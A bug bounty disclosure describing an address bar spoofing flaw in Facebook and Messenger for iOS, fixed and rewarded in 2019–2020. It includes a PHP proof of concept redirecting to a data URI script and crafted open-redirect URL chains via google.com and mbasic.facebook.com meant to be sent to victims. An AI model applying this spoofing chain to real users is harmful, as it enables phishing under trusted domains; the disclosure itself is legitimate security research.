FB & Messenger for iOS : Address Bar spoofing using data uri

Summary: Facebook & Messenger for iOS was vulnerable to Address Bar spoofing which was be reproduced by navigating from target domain to attackers domain.

Attackers domain was able to set location to data:text/html,<script>…</script> using location header, so it was executed in context while keeping target domain in url bar.

---

Steps to reproduce:

Setup:   
FBiOS: 229.0  
MessengerForiOS: 223.0  
Device: iPhone 6s  
OS: 12.3.1

• create php file with below code snippet:

<?php
header("Location: data:text/html,<script>document.write('<h1>Rahul Kankrale: URL spoofing using Data Uri</h1>')</script>");?>

and save/host it on server.

• To spoof Facebook domain chain exploit URL like below:
  https://www.google.com/url?q=https%3A%2F%2Fmbasic.facebook.com%2Fmessagingconfirmation%3Faction_url%3Dhttps%3A%2F%2Fyourmain%2Fexploit.php

  or to spoof google domain

  https://www.google.com/url?q=https%3A%2F%2Fyourmain%2Fexploit.php

• By sending those crafted URL to victim through messenger or posting Facebook wall, whenever victim opens google redirect page and click on redirecting url & for facebook poc once message delete page open click on delete button address bar sets to target domain with SSL while content is generated by data uri.

Proof of concept:

Timeline:

• 14/07/2019: Reported to Facebook bugbounty.
• 16/07/2019: Pre-Triaged
• 19/08/2019: Triaged
• 30/09/2019: Fixed in FB
• 29/10/2019: Rewarded $1500 for FB(iOS) issue
• 22/01/2020: Fixed & Rewarded $1500 for Messenger(iOS) issue

Thanks